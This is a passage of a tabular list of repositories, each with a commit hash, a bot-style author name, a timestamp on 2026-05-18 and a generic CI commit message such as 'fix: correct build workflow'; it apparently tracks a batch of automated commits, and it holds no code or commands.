| 2973 | duanpf/PakePlus-v2.1.5 | 85ff1fee6c8e | pipeline-bot | [email protected] | 2026-05-18T12:55:18.000Z | fix: correct build workflow |
| 2974 | chitthushine/angular-startup | 860e107033e9 | auto-ci | [email protected] | 2026-05-18T12:50:51.000Z | fix: correct build workflow |
| 2975 | Akisan98/akisans-website | 862091f2ba08 | build-bot | [email protected] | 2026-05-18T14:04:18.000Z | build: improve ci performance |
| 2976 | EnamulBokshi/rect-web-motion | 8623fb4c1f6d | auto-ci | [email protected] | 2026-05-18T15:33:12.000Z | chore: update ci/cd pipeline |
| 2977 | Stat184-Spring2025/Jonas_Practice | 8627012e1c74 | auto-ci | [email protected] | 2026-05-18T12:18:51.000Z | build: improve ci performance |
| 2978 | Akshith809/bccistats | 864078770834 | auto-ci | [email protected] | 2026-05-18T13:17:03.000Z | build: improve ci performance |
| 2979 | Enriiquecm/test-action-1779110816298978874 | 86519650dcdb | pipeline-bot | [email protected] | 2026-05-18T13:26:48.000Z | ci: update build config |
| 2980 | aj-techsoul/elicss | 86708f0b13da | pipeline-bot | [email protected] | 2026-05-18T13:42:19.000Z | ci: add build optimization step |
| 2981 | alanmunoz25/drupal-scripts | 868c864d455a | auto-ci | [email protected] | 2026-05-18T14:27:44.000Z | ci: add build optimization step |
| 2982 | Gigih1996/Task-Frontend | 869cbbb3cd1f | ci-bot | [email protected] | 2026-05-18T17:33:21.000Z | chore: sync ci configuration |
| 2983 | walasee/JJtechTower | 86ae225e8f00 | build-bot | [email protected] | 2026-05-18T16:08:37.000Z | fix: correct build workflow |
| 2984 | aliimranjazib/jobs_creator | 86ba6de62811 | auto-ci | [email protected] | 2026-05-18T16:23:08.000Z | ci: add build optimization step |
| 2985 | Gopikrishna54321/test-action-1778960008407396721 | 86c75ca02155 | build-bot | [email protected] | 2026-05-18T16:32:46.000Z | fix: correct build workflow |
| 2986 | deploy11/reactapicore | 86cb8ea37eb6 | pipeline-bot | [email protected] | 2026-05-18T11:51:53.000Z | ci: add build optimization step |
| 2987 | KnowFlow/OpenTitrator | 86d7b8420776 | build-bot | [email protected] | 2026-05-18T12:31:47.000Z | chore: optimize pipeline runtime |
| 2988 | majespectre00/myporj | 86d83c6756f0 | ci-bot | [email protected] | 2026-05-18T12:50:04.000Z | fix: correct build workflow |
| 2989 | UJ911/Energy-Demand-Forecast | 86dc511f0494 | build-bot | [email protected] | 2026-05-18T13:39:04.000Z | chore: sync ci configuration |
| 2990 | alexmagwe/todo_app | 870fc5732629 | ci-bot | [email protected] | 2026-05-18T13:00:04.000Z | ci: add build optimization step |
| 2991 | DekafTheFirst/tierra-green-resources-ltd | 87123d12c124 | auto-ci | [email protected] | 2026-05-18T12:43:20.000Z | ci: add build optimization step |
| 2992 | Driap/Blooket-Cheats | 872b06aad613 | auto-ci | [email protected] | 2026-05-18T16:14:27.000Z | chore: optimize pipeline runtime |
| 2993 | chicoluan/DFCom | 872e12165e87 | ci-bot | [email protected] | 2026-05-18T12:22:04.000Z | chore: sync ci configuration |
| 2994 | assiljaby/portfolio | 87360ff29be1 | build-bot | [email protected] | 2026-05-18T13:03:36.000Z | chore: update ci/cd pipeline |
| 2995 | Shirley940613/Shirley940429.Github.io | 873af70aefa7 | pipeline-bot | [email protected] | 2026-05-18T13:58:01.000Z | chore: optimize pipeline runtime |
| 2996 | myssaqil/Mobile-Native_Toko-Online | 87498d269a44 | pipeline-bot | [email protected] | 2026-05-18T14:16:52.000Z | fix: correct build workflow |
| 2997 | zarvish/chat-application | 877f26fda924 | pipeline-bot | [email protected] | 2026-05-18T12:24:30.000Z | build: improve ci performance |
| 2998 | smannic/voxflow-claude | 878079907848 | auto-ci | [email protected] | 2026-05-18T11:48:48.000Z | chore: update ci/cd pipeline |
| 2999 | nikhilagent/donation-app- | 87822e415ed4 | auto-ci | [email protected] | 2026-05-18T16:34:25.000Z | chore: optimize pipeline runtime |
| 3000 | C2x0dy2/Portfolio | 87a546c405cb | ci-bot | [email protected] | 2026-05-18T17:30:28.000Z | ci: add build optimization step |
| 3001 | noushiFlex/luxury-capsule | 87b11a55a28e | pipeline-bot | [email protected] | 2026-05-18T17:39:42.000Z | fix: correct build workflow |
| 3002 | BT3103AppDev1/l1-final-term-project-group-8 | 87b2003a0178 | build-bot | [email protected] | 2026-05-18T12:08:41.000Z | build: improve ci performance |
| 3003 | b1kaf7/Computer-Graphics | 87c360498793 | auto-ci | [email protected] | 2026-05-18T15:27:33.000Z | chore: update ci/cd pipeline |
| 3004 | Akisan98/bloc_test | 87c4be4c398b | pipeline-bot | [email protected] | 2026-05-18T14:06:17.000Z | chore: optimize pipeline runtime |
| 3005 | anshvarma07/SachinPortfolio | 87c6864bbf12 | build-bot | [email protected] | 2026-05-18T13:39:16.000Z | ci: update build config |
| 3006 | nnfuad/MATLAB_ECE2214 | 87cd1cce158a | pipeline-bot | [email protected] | 2026-05-18T13:28:47.000Z | chore: sync ci configuration |
| 3007 | MaximKabaev/MaximKabaev | 87d13e6c04ba | build-bot | [email protected] | 2026-05-18T14:31:54.000Z | ci: update build config |
| 3008 | BharatDasa/Perdue_AUG_git_java_SCM_DEMO | 87d606a5d30e | build-bot | [email protected] | 2026-05-18T13:51:12.000Z | ci: update build config |
| 3009 | Shirley940613/web20250422 | 87e77cae3eed | build-bot | [email protected] | 2026-05-18T13:58:17.000Z | fix: correct build workflow |
| 3010 | Uxfirststudio/uxfirststudio.github.io | 87eab688004a | build-bot | [email protected] | 2026-05-18T12:34:39.000Z | ci: update build config |
| 3011 | cyberwizardinstitute/externalresources | 88115d160796 | ci-bot | [email protected] | 2026-05-18T12:30:08.000Z | ci: add build optimization step |
| 3012 | SarahParkSehyun/SweepySwipe | 88120f4dfff2 | ci-bot | [email protected] | 2026-05-18T13:32:53.000Z | fix: correct build workflow |
| 3013 | jsupa/wincentik | 882422ef0f61 | pipeline-bot | [email protected] | 2026-05-18T11:52:00.000Z | chore: update ci/cd pipeline |
| 3014 | TAJPALCE/tajplace-full-stack-app | 884b70ce1d19 | ci-bot | [email protected] | 2026-05-18T16:18:48.000Z | ci: add build optimization step |
| 3015 | riomukhtarom/Biodata | 885b77e4a966 | ci-bot | [email protected] | 2026-05-18T15:48:10.000Z | fix: correct build workflow |
| 3016 | fychmen/aires-lab | 886e116c173e | pipeline-bot | [email protected] | 2026-05-18T11:41:54.000Z | chore: optimize pipeline runtime |
| 3017 | arshadmaryam-stack/roadrunner | 8876859fbb31 | pipeline-bot | [email protected] | 2026-05-18T16:26:00.000Z | fix: correct build workflow |
| 3018 | git-init-priyanshu/Notion-todo | 887f457c030a | auto-ci | [email protected] | 2026-05-18T17:01:40.000Z | ci: add build optimization step |
| 3019 | musatekin/computervision | 8881f8276fd7 | pipeline-bot | [email protected] | 2026-05-18T17:05:38.000Z | fix: correct build workflow |
| 3020 | chat21/chat21-node-sdk | 888d66154481 | auto-ci | [email protected] | 2026-05-18T13:09:03.000Z | ci: update build config |
| 3021 | sahidDev09/FoodPanda_recreate | 8895d88325ad | auto-ci | [email protected] | 2026-05-18T16:12:35.000Z | ci: update build config |
| 3022 | umairabhatti786/Astrology | 88a26913595a | auto-ci | [email protected] | 2026-05-18T12:59:17.000Z | fix: correct build workflow |
| 3023 | thecodinglive/hanbit-gradle-book-example | 88a8c2019af6 | ci-bot | [email protected] | 2026-05-18T12:47:03.000Z | build: improve ci performance |
| 3024 | Rajesh0055/test-action-1778959304148975348 | 88b7c83497f7 | ci-bot | [email protected] | 2026-05-18T13:34:52.000Z | chore: optimize pipeline runtime |
| 3025 | charlinegrard-coder/login-test | 88bdf9211cd5 | build-bot | [email protected] | 2026-05-18T15:54:41.000Z | chore: update ci/cd pipeline |
| 3026 | KushT00/Aion | 88c325093f12 | build-bot | [email protected] | 2026-05-18T17:08:11.000Z | chore: sync ci configuration |
| 3027 | MaximKabaev/BlackJack-ML | 88e1563d622c | build-bot | [email protected] | 2026-05-18T14:33:02.000Z | chore: update ci/cd pipeline |
| 3028 | ZunsodB/Proshop-frontend | 88e2023c9f36 | auto-ci | [email protected] | 2026-05-18T16:24:59.000Z | ci: add build optimization step |
| 3029 | phase23/axcessShopper | 88e703c1ac18 | pipeline-bot | [email protected] | 2026-05-18T11:46:17.000Z | ci: update build config |
| 3030 | junaidirshad098/DES-Algorithm | 88e791aaec94 | pipeline-bot | [email protected] | 2026-05-18T13:14:12.000Z | chore: update ci/cd pipeline |
| 3031 | b1kaf7/test-action-1778960691435131349 | 890653efeb69 | auto-ci | [email protected] | 2026-05-18T15:25:36.000Z | ci: update build config |
| 3032 | KryptonZQ/FOAILAB70 | 89076119da66 | ci-bot | [email protected] | 2026-05-18T12:50:48.000Z | ci: add build optimization step |
| 3033 | Bekir-Caglar/Flaggie-FlagQuiz | 891223b8e495 | ci-bot | [email protected] | 2026-05-18T13:16:34.000Z | chore: optimize pipeline runtime |
| 3034 | elenecu/mis-custom-hooks | 891d767950bd | ci-bot | [email protected] | 2026-05-18T16:09:16.000Z | build: improve ci performance |
| 3035 | aj-techsoul/ELI-CSS-FRAMEWORK | 8920b66568b4 | pipeline-bot | [email protected] | 2026-05-18T13:46:42.000Z | ci: add build optimization step |
| 3036 | alexbuiac/Image-Compressor-and-Decompressor | 892a4420b757 | build-bot | [email protected] | 2026-05-18T17:18:03.000Z | ci: update build config |
| 3037 | smit-sk/node-sample-app | 8939e79a0b5a | auto-ci | [email protected] | 2026-05-18T16:11:53.000Z | chore: optimize pipeline runtime |
| 3038 | tacmatic/sdfsdfsdf | 8966d781029d | auto-ci | [email protected] | 2026-05-18T12:47:32.000Z | chore: optimize pipeline runtime |
| 3039 | bishaldahal4777/credit_management | 897968370f6b | auto-ci | [email protected] | 2026-05-18T13:32:14.000Z | chore: sync ci configuration |
| 3040 | umakantmukhiya/test-action-1778959304116127831 | 898672cc7225 | pipeline-bot | [email protected] | 2026-05-18T15:41:57.000Z | ci: add build optimization step |
| 3041 | Luanderson-777/didactic-fishstick | 8986ef7e6f50 | build-bot | [email protected] | 2026-05-18T12:55:11.000Z | chore: optimize pipeline runtime |
| 3042 | danhoernchen/static_site_generator | 89911c628734 | build-bot | [email protected] | 2026-05-18T13:55:43.000Z | chore: optimize pipeline runtime |
| 3043 | Prime-Sushil/test-action-1779119164981548649 | 8998191f227c | build-bot | [email protected] | 2026-05-18T12:13:01.000Z | ci: add build optimization step |
| 3044 | quoeaire/data-structures-python3 | 899f1d3ad2dc | ci-bot | [email protected] | 2026-05-18T13:47:15.000Z | fix: correct build workflow |
| 3045 | Akshith809/cloudbasedchat | 89a68272bdd3 | auto-ci | [email protected] | 2026-05-18T13:16:30.000Z | chore: sync ci configuration |
| 3046 | Stat184-Spring2025/Sec2_FP_Sean_Preet_Peter | 89b7540a3e8e | ci-bot | [email protected] | 2026-05-18T12:13:46.000Z | build: improve ci performance |
| 3047 | deploy11/Sirdaryo-murojat-Backend | 89bd3105c982 | ci-bot | [email protected] | 2026-05-18T11:49:56.000Z | chore: sync ci configuration |
| 3048 | AmoghGupta07/Climate-Data-Analysis-System | 89c5526911cb | pipeline-bot | [email protected] | 2026-05-18T13:19:46.000Z | fix: correct build workflow |
| 3049 | VyLowry7337/webflyx | 89c5c8a1b9a6 | build-bot | [email protected] | 2026-05-18T13:56:47.000Z | chore: sync ci configuration |
| 3050 | waheed3742/ci-pipeline-1-ll4i | 89dfd497f3cd | build-bot | [email protected] | 2026-05-18T11:45:29.000Z | build: improve ci performance |
| 3051 | Sbongslany/eTaxi_ios | 89eea4f7d786 | build-bot | [email protected] | 2026-05-18T16:23:03.000Z | chore: optimize pipeline runtime |
| 3052 | BryanAlexanderSantoso/myapp | 89f48189c087 | pipeline-bot | [email protected] | 2026-05-18T13:40:34.000Z | chore: update ci/cd pipeline |
| 3053 | Heseela/nodejs | 89f5c8068fb6 | build-bot | [email protected] | 2026-05-18T12:16:37.000Z | chore: sync ci configuration |
| 3054 | kingjamesegun/Minesweeper | 89ff2bf8af05 | ci-bot | [email protected] | 2026-05-18T12:20:00.000Z | chore: optimize pipeline runtime |
| 3055 | WaveCloudx/spam-pairing-whatsapp | 8a1a43da03b2 | ci-bot | [email protected] | 2026-05-18T13:48:39.000Z | fix: correct build workflow |
| 3056 | epd19/test-action-1778959303999966908 | 8a1e216c01e9 | build-bot | [email protected] | 2026-05-18T13:39:58.000Z | fix: correct build workflow |
| 3057 | thanu-george/driver_drowsiness_detection | 8a21a8117a23 | auto-ci | [email protected] | 2026-05-18T13:02:54.000Z | chore: sync ci configuration |
| 3058 | alexmagwe/Betch-web-1 | 8a244e284b4a | build-bot | [email protected] | 2026-05-18T13:04:48.000Z | ci: update build config |
| 3059 | lucky-hw-kim/cats | 8a260de0f3c5 | auto-ci | [email protected] | 2026-05-18T12:45:03.000Z | build: improve ci performance |
| 3060 | NAXICHEK/conspect-video_forllm | 8a2fd1f36ba1 | pipeline-bot | [email protected] | 2026-05-18T14:56:50.000Z | chore: optimize pipeline runtime |
| 3061 | rajanyadav80/test-action-1778960691817257524 | 8a330f092d2e | auto-ci | [email protected] | 2026-05-18T13:06:20.000Z | chore: update ci/cd pipeline |
| 3062 | c0der0jal/atm_simulator | 8a3fae7171d4 | ci-bot | [email protected] | 2026-05-18T12:55:04.000Z | ci: update build config |
| 3063 | sahidDev09/The-Palace-Resort | 8a449d13c975 | pipeline-bot | [email protected] | 2026-05-18T16:02:39.000Z | ci: update build config |
| 3064 | Wiznet/ioLibrary_Driver | 8a454e601c4f | build-bot | [email protected] | 2026-05-18T16:26:31.000Z | chore: sync ci configuration |
| 3065 | Udbhav-2k25/udbhav-ht100-ga-039_-t78 | 8a457969b399 | pipeline-bot | [email protected] | 2026-05-18T13:07:41.000Z | chore: update ci/cd pipeline |
| 3066 | serena0322/serenagiuliani | 8a50fd9ca7b4 | ci-bot | [email protected] | 2026-05-18T12:55:44.000Z | build: improve ci performance |
| 3067 | VietNamCombatZ/LTMang | 8a566bae493e | auto-ci | [email protected] | 2026-05-18T15:44:37.000Z | build: improve ci performance |
| 3068 | Debbatisudheer/AVL-SQL-query | 8a656fbf55bf | build-bot | [email protected] | 2026-05-18T17:45:44.000Z | ci: add build optimization step |
| 3069 | EnamulBokshi/Wedding-template | 8a659d995bca | build-bot | [email protected] | 2026-05-18T15:36:17.000Z | fix: correct build workflow |
| 3070 | DipeshSinghNegi/IntervueAIi | 8a73b43e223c | build-bot | [email protected] | 2026-05-18T12:11:42.000Z | ci: update build config |
| 3071 | charanamith/skill-6 | 8a743553960d | auto-ci | [email protected] | 2026-05-18T17:00:39.000Z | ci: add build optimization step |
| 3072 | aalmonzer/NTI-AI-Training | 8a75fab1b6ea | pipeline-bot | [email protected] | 2026-05-18T12:59:50.000Z | chore: sync ci configuration |
| 3073 | Rezasz/ubuntu-vps-safe-hardening.sh | 8a76898ff592 | ci-bot | [email protected] | 2026-05-18T13:31:43.000Z | chore: sync ci configuration |
| 3074 | charanamith/SKILL-7 | 8a7707f01d70 | pipeline-bot | [email protected] | 2026-05-18T17:00:14.000Z | ci: add build optimization step |
| 3075 | ankitnagar34/Drum-Kit | 8a97353ae0a6 | auto-ci | [email protected] | 2026-05-18T16:14:53.000Z | fix: correct build workflow |
| 3076 | gokul-227/AWS-Data-Anomaly-Intelligence-Platform | 8aa56698f2b0 | pipeline-bot | [email protected] | 2026-05-18T16:21:28.000Z | chore: optimize pipeline runtime |
| 3077 | mk016/Hotel-Management | 8ac2092691f7 | ci-bot | [email protected] | 2026-05-18T16:32:22.000Z | build: improve ci performance |
| 3078 | kayosama007/ci-build-20260329-190130-1985 | 8acc071c4ebe | build-bot | [email protected] | 2026-05-18T14:24:38.000Z | chore: update ci/cd pipeline |
| 3079 | Raysharr/dashing-graph | 8ae828ef88ad | pipeline-bot | [email protected] | 2026-05-18T12:34:52.000Z | ci: add build optimization step |
| 3080 | Dn2280/ShowcaseOfProjects | 8ae98eb58078 | pipeline-bot | [email protected] | 2026-05-18T16:29:21.000Z | ci: update build config |
| 3081 | iamroshanpatak/to-do-list | 8aefc0d8d74b | auto-ci | [email protected] | 2026-05-18T16:30:32.000Z | ci: add build optimization step |
| 3082 | aledipa/QuiteMinimalCalculator | 8b0a2894b98f | build-bot | [email protected] | 2026-05-18T12:36:49.000Z | build: improve ci performance |
| 3083 | Ashwiin/spacex_dash_app | 8b1340d54268 | ci-bot | [email protected] | 2026-05-18T16:52:07.000Z | fix: correct build workflow |
| 3084 | Taha-khaled1/computer-world | 8b14b5e73857 | auto-ci | [email protected] | 2026-05-18T14:59:02.000Z | chore: sync ci configuration |
| 3085 | Marshall-Hu/Test | 8b19b7b87360 | auto-ci | [email protected] | 2026-05-18T13:56:05.000Z | chore: update ci/cd pipeline |
| 3086 | Akisan98/PartyBud | 8b546c638989 | build-bot | [email protected] | 2026-05-18T14:05:52.000Z | chore: optimize pipeline runtime |
| 3087 | arj1211/cluster-links | 8b565df0be98 | build-bot | [email protected] | 2026-05-18T15:41:26.000Z | chore: sync ci configuration |
| 3088 | arpita009/VocabsEasyy- | 8b587faf692d | ci-bot | [email protected] | 2026-05-18T16:36:33.000Z | ci: add build optimization step |
| 3089 | alexmagwe/gdrive-uploader | 8b591695ec5f | ci-bot | [email protected] | 2026-05-18T13:02:39.000Z | chore: sync ci configuration |
| 3090 | gitfarag/auth-system | 8b68e068c0f9 | auto-ci | [email protected] | 2026-05-18T17:25:38.000Z | build: improve ci performance |
| 3091 | tanfameng/algorithm | 8b6f9f09e5ec | ci-bot | [email protected] | 2026-05-18T13:01:16.000Z | fix: correct build workflow |
| 3092 | kayosama007/ci-build-20260329-190007-1343 | 8b76af113586 | auto-ci | [email protected] | 2026-05-18T14:25:02.000Z | chore: optimize pipeline runtime |
| 3093 | Husam-AbuZina/test-action-1778966162035429469 | 8b7926d0cbf4 | auto-ci | [email protected] | 2026-05-18T12:09:55.000Z | chore: sync ci configuration |
| 3094 | AlecHarrisGitHub/RhythmRewind | 8b87d9449cc2 | ci-bot | [email protected] | 2026-05-18T16:11:30.000Z | build: improve ci performance |
| 3095 | AmarKumarShaw/kibu-task | 8b8da41946c9 | ci-bot | [email protected] | 2026-05-18T12:12:40.000Z | ci: update build config |
| 3096 | kris0ten/naanMudhalvanapp | 8b96e8dcc17a | auto-ci | [email protected] | 2026-05-18T13:10:06.000Z | ci: update build config |
| 3097 | ParityBit-Security/treataltasmarketingpage | 8b9f3601262e | pipeline-bot | [email protected] | 2026-05-18T15:22:41.000Z | ci: add build optimization step |
| 3098 | Debbatisudheer/Sentiment-Based-Response-Bot | 8ba493b87a60 | ci-bot | [email protected] | 2026-05-18T17:04:36.000Z | chore: sync ci configuration |
| 3099 | lumathias/NutriCare_ | 8ba65563adab | auto-ci | [email protected] | 2026-05-18T15:32:23.000Z | chore: sync ci configuration |
| 3100 | osamahkenawy/leaflet-draw-map | 8ba7d8acc265 | ci-bot | [email protected] | 2026-05-18T15:20:20.000Z | ci: add build optimization step |
| 3101 | udemy-dev-withK8s-AWS-codedecode/user-service | 8ba83e8e767b | ci-bot | [email protected] | 2026-05-18T17:10:03.000Z | fix: correct build workflow |
| 3102 | vansh7266/portfolio | 8bb2d0e72b39 | pipeline-bot | [email protected] | 2026-05-18T16:46:17.000Z | fix: correct build workflow |
| 3103 | batnano/agent | 8bb70a8773b9 | auto-ci | [email protected] | 2026-05-18T15:27:49.000Z | fix: correct build workflow |
| 3104 | nnfuad/ML-Projects | 8bc966169ccf | pipeline-bot | [email protected] | 2026-05-18T13:28:05.000Z | fix: correct build workflow |
| 3105 | Skypieee6/pdf-tools | 8bd8de3cfa6c | ci-bot | [email protected] | 2026-05-18T14:33:38.000Z | chore: sync ci configuration |
| 3106 | dark733/SimpleBrowser | 8bddbab2b1df | ci-bot | [email protected] | 2026-05-18T14:05:52.000Z | chore: optimize pipeline runtime |
| 3107 | semacu/202101-data-science-python | 8be5ae0eb1c7 | pipeline-bot | [email protected] | 2026-05-18T15:42:39.000Z | chore: optimize pipeline runtime |
| 3108 | Udbhav-2k25/udbhav-ht100-ga-020 | 8be5c0b1d83e | auto-ci | [email protected] | 2026-05-18T13:05:01.000Z | chore: update ci/cd pipeline |
| 3109 | saradune6/Chatgbt-Clone | 8be6d520fcad | pipeline-bot | [email protected] | 2026-05-18T13:01:51.000Z | ci: update build config |
| 3110 | Black-Iron-Project/OTA | 8bec41f76605 | auto-ci | [email protected] | 2026-05-18T17:33:48.000Z | ci: add build optimization step |
| 3111 | keke0712/CS61B-Tutorial | 8bed1c4827fe | auto-ci | [email protected] | 2026-05-18T16:15:33.000Z | build: improve ci performance |
| 3112 | jongsun-park/ops-inertia | 8befdb16d0f6 | build-bot | [email protected] | 2026-05-18T16:19:18.000Z | chore: sync ci configuration |
| 3113 | crypto-market-bots/vegiapp-backend | 8bf5043bef11 | ci-bot | [email protected] | 2026-05-18T12:27:15.000Z | chore: optimize pipeline runtime |
| 3114 | cybxrrgsouraabh/DataLens-Ai_vibe | 8bf6d0afae51 | build-bot | [email protected] | 2026-05-18T12:14:49.000Z | ci: add build optimization step |
| 3115 | An63llvs/test-action-1778997996751914551 | 8bf9bd54934c | auto-ci | [email protected] | 2026-05-18T12:12:58.000Z | ci: add build optimization step |
| 3116 | NicolNonga/new_projecto | 8bfae539eaa3 | auto-ci | [email protected] | 2026-05-18T12:18:41.000Z | chore: update ci/cd pipeline |
| 3117 | JKS-sys/MongoBar-At-0001-2025 | 8bfc8f820fa8 | auto-ci | [email protected] | 2026-05-18T14:13:44.000Z | chore: update ci/cd pipeline |
| 3118 | andersonphiri/realworldvue | 8c03021067bd | ci-bot | [email protected] | 2026-05-18T13:58:33.000Z | ci: update build config |
| 3119 | praktikum-java/java-core-bighw-kvserver | 8c0555b14acf | build-bot | [email protected] | 2026-05-18T13:57:49.000Z | chore: update ci/cd pipeline |
| 3120 | NMA2019/projects | 8c220563ea36 | pipeline-bot | [email protected] | 2026-05-18T12:09:26.000Z | fix: correct build workflow |
| 3121 | 0-pavand/PlantDiseaseDoctor | 8c23c1f9f601 | ci-bot | [email protected] | 2026-05-18T12:56:55.000Z | fix: correct build workflow |
| 3122 | roydellclarke/connectie | 8c2b2e982fa2 | ci-bot | [email protected] | 2026-05-18T13:04:04.000Z | chore: sync ci configuration |
| 3123 | AdilameerAdi/Freelanceproject | 8c33cdbbb0fd | build-bot | [email protected] | 2026-05-18T12:36:43.000Z | ci: add build optimization step |
| 3124 | Srj-Love/Dagger-Hilt-Demo | 8c3709ec66fd | pipeline-bot | [email protected] | 2026-05-18T12:49:55.000Z | ci: update build config |
| 3125 | harshNaik99/test-action-1779100876365031392 | 8c3a77df6792 | build-bot | [email protected] | 2026-05-18T16:02:24.000Z | build: improve ci performance |
| 3126 | mirfanjazuli/wafa-leads-management | 8c4aa6d3fea5 | ci-bot | [email protected] | 2026-05-18T16:35:06.000Z | ci: update build config |
| 3127 | Radwa-Tareek/websec2301038711 | 8c4ff52e5c8a | auto-ci | [email protected] | 2026-05-18T13:00:47.000Z | build: improve ci performance |
| 3128 | sahidDev09/WriteWave-Client-react | 8c55a1fa1c4e | auto-ci | [email protected] | 2026-05-18T16:09:54.000Z | fix: correct build workflow |
| 3129 | riomukhtarom/android-sql | 8c588a4d538f | pipeline-bot | [email protected] | 2026-05-18T15:44:02.000Z | chore: optimize pipeline runtime |
| 3130 | yashlad27/cs5700-srft-grp19 | 8c60cecbb1f8 | pipeline-bot | [email protected] | 2026-05-18T13:24:33.000Z | fix: correct build workflow |
| 3131 | MR-AYAN-CHOWDHURY/GOATBOT-V2 | 8c6227b4d024 | pipeline-bot | [email protected] | 2026-05-18T11:44:09.000Z | chore: optimize pipeline runtime |
| 3132 | SoyJuaneto/Wincome | 8c653adb7a90 | auto-ci | [email protected] | 2026-05-18T16:07:20.000Z | build: improve ci performance |
| 3133 | ErezD1/test-action-1778960691906935011 | 8c6d3d049cfb | pipeline-bot | [email protected] | 2026-05-18T12:26:16.000Z | chore: sync ci configuration |
| 3134 | SaraNabil/Calculator | 8c6e6e2dbd4d | build-bot | [email protected] | 2026-05-18T16:12:24.000Z | ci: update build config |
| 3135 | Husam-AbuZina/SoftwareEngineering | 8c9f7de3367c | ci-bot | [email protected] | 2026-05-18T12:23:43.000Z | ci: add build optimization step |
| 3136 | Dejlof/React-Jobs-Clone | 8cd695fc8fae | build-bot | [email protected] | 2026-05-18T15:57:40.000Z | fix: correct build workflow |
| 3137 | revel-um/test-action-1778959304139453238 | 8ce2779558d2 | build-bot | [email protected] | 2026-05-18T12:04:48.000Z | build: improve ci performance |
| 3138 | prasiddhp10/StudentManagementSystem | 8ce9d3ce9390 | build-bot | [email protected] | 2026-05-18T12:40:44.000Z | chore: sync ci configuration |
| 3139 | batnano/blog | 8cece6725d34 | auto-ci | [email protected] | 2026-05-18T15:28:06.000Z | chore: sync ci configuration |
| 3140 | ibrahiemhss/reorderable_list_view | 8cfb786dbef8 | ci-bot | [email protected] | 2026-05-18T14:06:34.000Z | ci: update build config |
| 3141 | expexpert/demotask | 8cfe484acca9 | pipeline-bot | [email protected] | 2026-05-18T12:16:49.000Z | ci: update build config |
| 3142 | smallziz18/Di-center4i-Ai4Nieup-Backend | 8d0be5854143 | build-bot | [email protected] | 2026-05-18T12:05:16.000Z | ci: add build optimization step |
| 3143 | Blessing-Chitiyo/test-action-1779119164755917653 | 8d1496f51d57 | build-bot | [email protected] | 2026-05-18T16:50:01.000Z | ci: add build optimization step |
| 3144 | Akisan98/chin_chin | 8d1b19919233 | pipeline-bot | [email protected] | 2026-05-18T14:05:38.000Z | chore: optimize pipeline runtime |
| 3145 | Epikoding/claude-activity-monitor | 8d1fa5b0f768 | ci-bot | [email protected] | 2026-05-18T12:21:29.000Z | chore: sync ci configuration |
| 3146 | yashlad27/CS5200 | 8d254d6b06f7 | ci-bot | [email protected] | 2026-05-18T13:29:13.000Z | chore: update ci/cd pipeline |
| 3147 | dream77r/my-claude-bot-skills | 8d2b8a50290d | auto-ci | [email protected] | 2026-05-18T17:33:27.000Z | fix: correct build workflow |
| 3148 | CTSE-book-exchange-system/notification-service | 8d2fab91725c | auto-ci | [email protected] | 2026-05-18T13:55:37.000Z | ci: update build config |
| 3149 | XinyiC23/test-action-1779119165095820357 | 8d342c4af5be | ci-bot | [email protected] | 2026-05-18T16:35:59.000Z | chore: update ci/cd pipeline |
| 3150 | bbarreto96/Travel_Page | 8d3767c7d20c | build-bot | [email protected] | 2026-05-18T16:51:32.000Z | chore: update ci/cd pipeline |
| 3151 | rajanyadav80/test-action-1778957958813315818 | 8d37e33744d9 | auto-ci | [email protected] | 2026-05-18T13:06:39.000Z | chore: optimize pipeline runtime |
| 3152 | ankitnagar34/TODO- | 8d3a170f61c9 | build-bot | [email protected] | 2026-05-18T16:07:59.000Z | ci: add build optimization step |
| 3153 | mukesh682/Sales_Trend_Predictor | 8d3d2400d995 | pipeline-bot | [email protected] | 2026-05-18T12:15:54.000Z | chore: update ci/cd pipeline |
| 3154 | saradune6/Geo-Iq-Features | 8d40240f4bb0 | auto-ci | [email protected] | 2026-05-18T12:59:50.000Z | chore: update ci/cd pipeline |
| 3155 | SuyeongUeno/python_day3 | 8d494a7bfe6d | pipeline-bot | [email protected] | 2026-05-18T17:10:50.000Z | chore: optimize pipeline runtime |
| 3156 | osamahkenawy/Medan-BinladnHR | 8d4f67e48bf1 | auto-ci | [email protected] | 2026-05-18T15:23:39.000Z | chore: optimize pipeline runtime |
| 3157 | azimsidd/TodoList | 8d5038e39de4 | ci-bot | [email protected] | 2026-05-18T13:24:58.000Z | chore: update ci/cd pipeline |
| 3158 | VietNamCombatZ/QLDA-student-management | 8d54c1735dea | ci-bot | [email protected] | 2026-05-18T15:42:09.000Z | ci: update build config |
| 3159 | eemreozen/Practical | 8d5d4bfc096c | build-bot | [email protected] | 2026-05-18T13:14:19.000Z | fix: correct build workflow |
| 3160 | aperritano/claude-tmux-ghostty | 8d5edf68bc21 | build-bot | [email protected] | 2026-05-18T17:08:00.000Z | chore: optimize pipeline runtime |
| 3161 | Gigih1996/notes-app | 8d60235df9cb | pipeline-bot | [email protected] | 2026-05-18T17:35:09.000Z | chore: update ci/cd pipeline |
| 3162 | AstraZeneca/data-science-python-course | 8d78ad2c21f3 | pipeline-bot | [email protected] | 2026-05-18T15:40:29.000Z | chore: sync ci configuration |
| 3163 | danhoernchen/odin-hash-map | 8d868eceb0c1 | build-bot | [email protected] | 2026-05-18T13:54:02.000Z | fix: correct build workflow |
| 3164 | Anthony-Mwangi-DQ/test-action-1778997996718874882 | 8d87ec4c4260 | ci-bot | [email protected] | 2026-05-18T13:32:31.000Z | chore: update ci/cd pipeline |
| 3165 | ShaileshS237/password-generator | 8d8a079b65d2 | pipeline-bot | [email protected] | 2026-05-18T17:01:40.000Z | ci: add build optimization step |
| 3166 | varunvaghasiya11/Java_script_basic_calculation | 8d9ef8b898d9 | auto-ci | [email protected] | 2026-05-18T14:00:41.000Z | chore: sync ci configuration |
| 3167 | simesta-ai/simesta-web | 8dbaffae6be8 | auto-ci | [email protected] | 2026-05-18T17:35:24.000Z | chore: update ci/cd pipeline |
| 3168 | nebink/Personalised-medicine-recommendation-system | 8dbcc7e6e278 | pipeline-bot | [email protected] | 2026-05-18T12:15:52.000Z | fix: correct build workflow |
| 3169 | lucky-hw-kim/lucky-hw-kim | 8dbf0e5987b0 | ci-bot | [email protected] | 2026-05-18T12:30:42.000Z | fix: correct build workflow |
| 3170 | Denis10/AndroidViews | 8dcddceaec56 | auto-ci | [email protected] | 2026-05-18T13:58:04.000Z | chore: optimize pipeline runtime |
| 3171 | facucasalanguida-dotcom/Oracle-Spain-CPI | 8dddebd42fbc | pipeline-bot | [email protected] | 2026-05-18T13:08:47.000Z | ci: add build optimization step |
